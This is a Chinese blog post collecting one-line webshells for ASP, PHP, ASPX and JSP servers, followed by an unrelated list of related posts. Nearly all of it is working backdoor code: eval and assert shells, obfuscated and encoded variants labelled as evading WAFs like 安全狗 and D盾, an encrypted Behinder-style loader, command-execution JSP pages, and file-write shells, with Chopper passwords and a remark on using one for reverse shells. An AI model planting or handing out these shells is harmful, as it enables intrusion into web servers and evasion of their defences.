• PHP、asp、aspx、JSP一句话


    PHP、asp、aspx、JSP一句话

    1、asp一句话木马:
    <%eval request(“x”)%>
    2、php一句话木马:
    <?php eval($_POST[g]);?>
    3、aspx一句话:
    <%@ Page Language=”Jscript”%><%eval(Request.Item["x"],”unsafe”);%>
    4、数据库加密一句话(密码a):
    ┼攠数畣整爠焕敌瑳∨≡┩忾
    5、网站配置、版权信息专用一句话:
    ”%><%Eval Request(x)%>
    6、一句话再过护卫神:
    <%Y=request(“x”)%> <%execute(Y)%>
    7、过拦截一句话木马:
    <% eXEcGlOBaL ReQuEsT(“x”) %>
    8、asp闭合型一句话:
    %><%eval request(“0o1Znz1ow”)%><%
    9、能过安全狗的解析格式:
    ;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg 
    10、突破安全狗的一句话:
    <%Y=request(“x”)%> <%eval(Y)%>
    11、elong过安全狗的php一句话:
    <?php $a = “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST[cc]); ?>
    12、突破护卫神,保护盾一句话:
    <?php $a = str_replace(x,”",”axsxxsxexrxxt”);
    $a($_POST["test"]); ?>
    13、高强度php一句话:
    <?php substr(md5($_REQUEST['heroes']),28)==’acd0′&&eval($_REQUEST['c']);?>
     
    14、后台常用写入php一句话(密码x):
    <?
    $fp = @fopen(“c.php”, ‘a’);
    f@fwrite($fp, ‘<’.'?php’.” ”.’eval($_POST[x])’.” ?”.”> ”);
    @fclose($fp);
    ?>
     
    15、许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传,这样一句话木马就写入不进数据库了。
    ‘ E& Y; Y1 R$ s# ]. L$ c改成:〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script
    这样就避开了使用〈%%〉,保存为.ASP,程序照样执行的效果是一样的
     
    16、PHP高强度一句话:
    <?php substr(md5($_REQUEST['x']),28)==’acd0′&&eval($_REQUEST['c']);?> 菜刀连接:/x.php?x=lostwolf 脚本类型:php 密码:c
    <?php assert($_REQUEST["c"]);?> 菜刀连接 躲避检测 密码:c
     
    17、突破安全狗的aspx的一句话:
    <%@ Page Language=”C#” ValidateRequest=”false” %>
    <%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
     
     18、php变异一句话:
    <?php ${"x47Lx4fx42x41LS"}["x6cx68x73lx61wk"]="c";$kvbemdpsn="c";${"x47x4cx4fx42x41x4cS"}["x68x78ax77x67x6dx6dx70x6cx77o"]="bx6bx66";${"GLOBx41Lx53"}["x70txx75x76x74uijx6d"]="x76bl";${"x47x4cx4fBx41x4cx53"}["gx6fx6flx72x7a"]="x62x6bx66";${${"x47x4cOx42x41x4cx53"}["px74xux76x74x75x69x6ax6d"]}=str_replace("x74x69","","x74x69stx69tx74irx74ix5frtx69x65x74x69plx74ix61tx69x63x65");${${"Gx4cOx42x41x4cS"}["x68x78x61x77gmx6dx70x6cx77x6f"]}=${${"Gx4cx4fx42x41x4cS"}["x70tx78x75x76x74x75ijm"]}("x6b","","x6bx62x61kx73x6bx65x36x6bx34kx5fkdkx65x6bx63x6bx6fx6bx64ke");${${"x47Lx4fx42ALS"}["lhx73x6cx61x77x6b"]}=${${"x47x4cOx42Ax4cx53"}["gx6fx6fx6crx7a"]}("YXx4ezZXx49=").@$_GET["n"]."x74";@${$kvbemdpsn}($_POST["59f1f"]);echo "ax62cx61x62cabx63n";?>
     
    19、绕阿里云冰蝎php
    <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extendu0073 ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
     
    20、JSP一句话收集
    <%
    if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
    %>
    在浏览器地址栏输入http://127.0.0.1:8080/222.jsp?f=1.txt&t=hello world
    然后再输入http://127.0.0.1:8080/test/1.txt
     
    21、jsp无回显执行系统命令:
    <%Runtime.getRuntime().exec(request.getParameter("i"));%>
    请求:http://127.0.0.1:8080/Shell/cmd2.jsp?i=ls
    执行之后不会有任何回显,用来反弹个shell很方便。
     
    22、jsp有回显带密码验证的:
    <%
    if("023".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
    out.println(new String(b));
    }
    out.print("</pre>");
    }
    %>
    请求:http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls
     
    23、JSP
    <%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %>
    <html>
    <head>
    <title></title>
    <meta http-equiv="Content-Type" content="text/html; charset=big5">
    </head>
    <body>
    <%
    Runtime runtime = Runtime.getRuntime();
    Process process =null;
    String line=null;
    InputStream is =null;
    InputStreamReader isr=null;
    BufferedReader br =null;
    String ip=request.getParameter("cmd");
    try
    {
    process =runtime.exec(ip);
    is = process.getInputStream();
    isr=new InputStreamReader(is);
    br =new BufferedReader(isr);
    out.println("<pre>");
    while( (line = br.readLine()) != null )
    {
    out.println(line);
    out.flush();
    }
    out.println("</pre>");
    is.close();
    isr.close();
    br.close();
    }
    catch(IOException e )
    {
    out.println(e);
    runtime.exit(1);
    }
    %>
    </body>
    </html>
    24、aspx木马收集:
     
    <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>
    随日期变化的连接密码, Asp.NET服务端写法:
    <%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>
    例如:菜刀的密码为chopper,在前面加三个字符,新密码为:{D}chopper
    <%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
     
    <script runat="server" language="JScript">
    function popup(str) {
    var q = "u";
    var w = "afe";
    var a = q + "ns" + w;
    var b= eval(str,a);
    return(b);
    }
    </script>
    <%
    popup(popup(System.Text.Encoding.GetEncoding(65001).
    GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));
    %>
    密码 z
     
     
    <%@ Page Language="Jscript" validateRequest="false" %>
    <%
    var keng 
    keng = Request.Item["never"];
    Response.Write(eval(keng,"unsafe"));
    %>
     
    <%@ Page Language = Jscript %>
    <%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/
    "a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+
    "[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
    ","+"""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"""+")";eval
    (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>
    密码 -7
    <%@PAGE LANGUAGE=JSCRIPT%>
    <%var PAY:String=Request["x61x62x63x64"];
    eval(PAY,"x75x6Ex73x61"+"x66x65");
    %>
    密码 abcd
    <%@PAGE LANGUAGE=JSCRIPT%>
    <%var PAY:String=
    Request["x61x62x63x64"];eval
    (PAY,"x75x6Ex73x61"+
    "x66x65");%>
     
    过狗过D盾一句话
    <%@ Page Language="Jscript" Debug=true%>
    <%
    var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0="));
    var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));
    var c=eval(a,b);
    eval(c,b);
    %>
     
    <%@ Page Language="Jscript" Debug=true%>
    <%
    var a=Request.Form["pass"];
    var b="unsa",c="fe",d=b+c;
    function fun()
    {
    return a;
    }
    eval(fun(),d);
    %>
  • 相关阅读:
    pyenv: python2.7: command not found The `python2.7' command exists in these Python versions: 2.7.5
    Gazebo_02_build_a_robot
    Gazebo_01_getting_start
    vscode等编辑器中报Exception has occurred: ModuleNotFoundError No module named 'requests'
    Ubuntu16.04安装Python3.8以后出现lsb_release/No LSB modules are available的错误
    C语言字符串定义(数组&指针)
    电脑软件更新管理
    VS2017自定义新建模板
    《SQL必知必会-第四版》--学习摘抄
    实体类封装数据库查询信息(工具一)
  • 原文地址:https://www.cnblogs.com/despotic/p/11653848.html
Copyright © 2020-2023  润新知